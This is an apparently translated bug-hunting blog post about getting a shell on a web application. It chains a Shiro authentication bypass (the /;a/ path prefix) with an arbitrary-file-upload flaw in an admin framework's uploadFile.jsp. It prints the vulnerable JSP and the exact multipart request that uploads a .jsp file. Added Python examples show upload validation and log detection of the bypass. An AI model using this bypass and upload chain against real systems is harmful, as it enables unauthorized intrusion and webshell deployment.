Shells from back in the day: Shiro authentication bypass

0x01 Shiro deserialization RCE?

Routine bug hunting; the Burp Suite Shiro plugin raised an alert.

Neither ShiroExploit's DNSLog mode nor its static-file echo mode detected anything, and the Tomcat echo did not work either.

0x02 Arbitrary file upload?

The site opened to a login form.

I captured the traffic and found that the CAPTCHA was not actually being checked, but a round of brute-forcing got nothing. I then noticed the framework was a certain admin framework; a Google search for known vulnerabilities in it turned up a post.

It said the file plugins/uploadify/uploadFile.jsp exists and that it allows arbitrary file upload:

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*, java.util.*, org.apache.commons.fileupload.*, java.util.*" %>
<%@ page import="org.apache.commons.fileupload.disk.*, org.apache.commons.fileupload.servlet.*" %>
<%!
	
	public void upload(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException {
		String savePath = this.getServletConfig().getServletContext().getRealPath("");
		savePath = savePath + request.getParameter("uploadPath");
		File f1 = new File(savePath);
		// the uploadPath value is taken straight from the request here  System.out.println(request.getParameter("uploadPath"));
		if (!f1.exists()) {
			f1.mkdirs();
		}
		DiskFileItemFactory fac = new DiskFileItemFactory();
		ServletFileUpload upload = new ServletFileUpload(fac);
		upload.setHeaderEncoding("utf-8");
		List fileList = null;
		try {
			fileList = upload.parseRequest(request);
		} catch (FileUploadException ex) {
			return;
		}
		
		
		String fileNmae = request.getParameter("fileNmae"); 
		Iterator<FileItem> it = fileList.iterator();
		String name = "";
		String extName = "";
		while (it.hasNext()) {
			FileItem item = it.next();
			if (!item.isFormField()) {
				name = item.getName();
				long size = item.getSize();
				String type = item.getContentType();
				//System.out.println(size + " " + type);
				if (name == null || name.trim().equals("")) {
					continue;
				}
	
				// extension:
				if (name.lastIndexOf(".") >= 0) {
					extName = name.substring(name.lastIndexOf("."));
				}
	
				File file = null;
				if(null != fileNmae && !"".equals(fileNmae)){
					file = new File(savePath + fileNmae);
				}else{
					do {
						if(null != fileNmae && !"".equals(fileNmae)){
							file = new File(savePath + fileNmae);
						}else{
							name = new java.text.SimpleDateFormat("yyyyMMddhhmmss").format(new Date());	// get the current date
							name = name + (int)(Math.random()*90000+10000);
							file = new File(savePath + name + extName);
						}
					} while (file.exists());
				}
	
				File saveFile = new File(savePath + name + extName);
				try {
					item.write(saveFile);
				} catch (Exception e) {
					e.printStackTrace();
				}
			}
		}
		response.getWriter().print((name.trim() + extName.trim()).trim());
	}
%>
<%
	upload(request, response);
%>
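Two things in uploadFile.jsp make it an arbitrary file write rather than an image upload: the target directory is built by concatenating the client-supplied uploadPath onto the application's real path, and the stored extension is copied from the client's filename with no allowlist, so a .jsp lands inside the webroot where the container will happily execute it. The Python below is an added example, not code from the original post or from the admin framework; it shows the check logic a fixed handler needs (a server-side directory allowlist instead of a client path, a generated file name, an extension allowlist applied to the final extension, and a containment check against an upload root outside the webroot). The legacy_target helper mirrors the JSP's concatenation only for contrast. UPLOAD_ROOT, UPLOAD_SUBDIRS and the function names are my own assumptions.

```python
"""
Upload-path validation that uploadFile.jsp lacks (added example, not the
project's code). The same checks port directly to the JSP.
"""
import os
import posixpath
import secrets

# Assumed configuration: the upload root lives outside the servlet webroot,
# and the client may only pick a directory from this fixed list.
UPLOAD_ROOT = "/var/app/uploads"
UPLOAD_SUBDIRS = {"images", "avatars"}
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def legacy_target(webroot: str, upload_path: str, client_filename: str) -> str:
    """How uploadFile.jsp computes the stored path: webroot + client uploadPath +
    generated name + client extension. 'GENERATED' stands in for the date+random
    name. Shown only to contrast with resolve_target below."""
    ext = client_filename[client_filename.rfind("."):] if "." in client_filename else ""
    return webroot + upload_path + "GENERATED" + ext


def safe_extension(client_filename: str) -> str:
    """Return the lowercase final extension of the client filename if it is
    allowlisted. Only the last extension counts, so 'x.jpg.jsp' is rejected;
    directory parts (either slash style) are discarded first."""
    base = os.path.basename(client_filename.replace("\\", "/"))
    _, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} not allowed")
    return ext


def resolve_target(subdir: str, client_filename: str, root: str = UPLOAD_ROOT) -> str:
    """Decide where an upload is stored. The directory must come from the
    server-side allowlist, the file name is generated (the client's name is
    never used), and the result is proven to stay inside root."""
    if subdir not in UPLOAD_SUBDIRS:
        raise UploadRejected(f"upload directory {subdir!r} not allowed")
    ext = safe_extension(client_filename)
    name = secrets.token_hex(16) + ext
    target = posixpath.normpath(posixpath.join(root, subdir, name))
    # Defence in depth: even with an allowlisted subdir, confirm containment.
    if posixpath.commonpath([root, target]) != root:
        raise UploadRejected("resolved path escapes the upload root")
    return target


if __name__ == "__main__":
    # Constructed request values modelled on the post: the JSP would write a
    # .jsp under the webroot; the hardened resolver rejects it.
    print(legacy_target("/opt/tomcat/webapps/ROOT", "/plugins/uploadify/", "2204249.jsp"))
    try:
        resolve_target("images", "2204249.jsp")
    except UploadRejected as exc:
        print("rejected:", exc)
    print(resolve_target("images", "photo.JPG"))
```

Storing uploads outside the webroot is what removes the execution risk entirely; the extension allowlist and generated name then only have to protect against content-sniffing and overwrite problems rather than code execution.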

Trying to access the file gave a "not logged in" 302 redirect.

Then it occurred to me: the site uses Shiro, and although the deserialization RCE had been patched, the recently disclosed Shiro authentication bypass surely had not been fixed yet. For details see this article: https://mp.weixin.qq.com/s/yb6Tb7zSTKKmBlcNVz0MBA

We use

/;a/plugins/uploadify/uploadFile.jsp

to bypass Shiro's access control; note that the status code is now 200.
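The mismatch behind this bypass is that the servlet container strips ";param" path parameters from each URI segment before mapping the request, so the container serves /plugins/uploadify/uploadFile.jsp, while Shiro's path matching normalized the URI differently and never applied the rule protecting /plugins/**. From the defender's side the tell-tale is in the access log: the raw request target carries a path parameter and resolves to a protected path that the literal target does not match. The Python below is an added example, not part of the original post; it normalizes targets the way the container does, evaluates Ant-style protected patterns against both forms, and flags the lines where only the normalized path is protected. The log lines, the PROTECTED list and the function names are constructed assumptions.

```python
"""
Detect path-parameter authorization-bypass attempts in web access logs.
Added example, not code from the original post; sample log lines are constructed.
"""
import posixpath
import re
from urllib.parse import unquote

# Common/combined log format request field: "METHOD target HTTP/x.y" status
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" (?P<status>\d{3})')


def raw_path(target: str) -> str:
    """Target with the query string removed but path parameters left in place:
    what a matcher that skips per-segment normalization would test patterns on."""
    return target.split("?", 1)[0]


def container_path(target: str) -> str:
    """Path as a servlet container maps it: query string dropped, ';param'
    removed from every segment (before percent-decoding, as Tomcat does),
    segments decoded, then '.', '..' and '//' normalized."""
    segments = [unquote(seg.split(";", 1)[0]) for seg in raw_path(target).split("/")]
    joined = "/" + "/".join(seg for seg in segments if seg)
    return posixpath.normpath(joined)


def ant_match(pattern: str, path: str) -> bool:
    """Minimal Ant-style matcher: '**' spans segments, '*' stays within one."""
    regex = (re.escape(pattern)
             .replace(r"/\*\*", "(/.*)?")
             .replace(r"\*\*", ".*")
             .replace(r"\*", "[^/]*"))
    return re.fullmatch(regex, path) is not None


def has_path_params(target: str) -> bool:
    """True when any segment of the raw path carries a ';param' path parameter."""
    return any(";" in seg for seg in raw_path(target).split("/"))


def find_bypass_attempts(log_lines, protected_patterns):
    """Return (status, raw_target, resolved_path) for requests whose resolved
    path is protected while the raw path matches no protected pattern. A
    ';jsessionid=' on the last segment of an already-protected path does not
    fire, because the raw path still matches the pattern."""
    findings = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        resolved = container_path(target)
        resolved_protected = any(ant_match(p, resolved) for p in protected_patterns)
        raw_protected = any(ant_match(p, raw_path(target)) for p in protected_patterns)
        if resolved_protected and not raw_protected and has_path_params(target):
            findings.append((m.group("status"), target, resolved))
    return findings


# Constructed sample log: a redirect on the direct request, two path-parameter
# requests that reach the protected JSP, and two benign lines.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /plugins/uploadify/uploadFile.jsp HTTP/1.1" 302 0',
    '10.0.0.5 - - [01/Jan/2020:10:00:09 +0000] "GET /;a/plugins/uploadify/uploadFile.jsp HTTP/1.1" 200 17',
    '10.0.0.5 - - [01/Jan/2020:10:00:15 +0000] "POST /;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1" 200 23',
    '10.0.0.9 - - [01/Jan/2020:10:01:00 +0000] "GET /index.jsp;jsessionid=ABC123 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:01:05 +0000] "GET /static/app.js HTTP/1.1" 200 4096',
]
# Assumed patterns that the Shiro filter chain was meant to protect.
PROTECTED = ["/plugins/**", "/admin/**"]

if __name__ == "__main__":
    for status, target, resolved in find_bypass_attempts(SAMPLE_LOG, PROTECTED):
        print(f"{status} {target} -> served as {resolved}")
```

The same comparison can be run live in a filter or WAF rule: if the container-normalized path differs from the literal one and falls under an authenticated area, deny or at least alert. Alerting on the 200 status after a 302 on the plain path, as in the sample, is the pattern that distinguishes a successful bypass from a scanner probe.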

Combining this with the code shown earlier, the upload request needs two parameters.

The upload reported success, but the file was nowhere to be found.

On closer inspection, request.getParameter("uploadPath") cannot read parameters from the multipart body, so I rebuilt the upload request with uploadPath in the query string:

POST /;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQDeBiVqfe6p3FMnJ


------WebKitFormBoundaryQDeBiVqfe6p3FMnJ
Content-Disposition: form-data; name="imgFile"; filename="2204249.jsp"
Content-Type: image/jpeg

test
------WebKitFormBoundaryQDeBiVqfe6p3FMnJ--

Shell obtained.
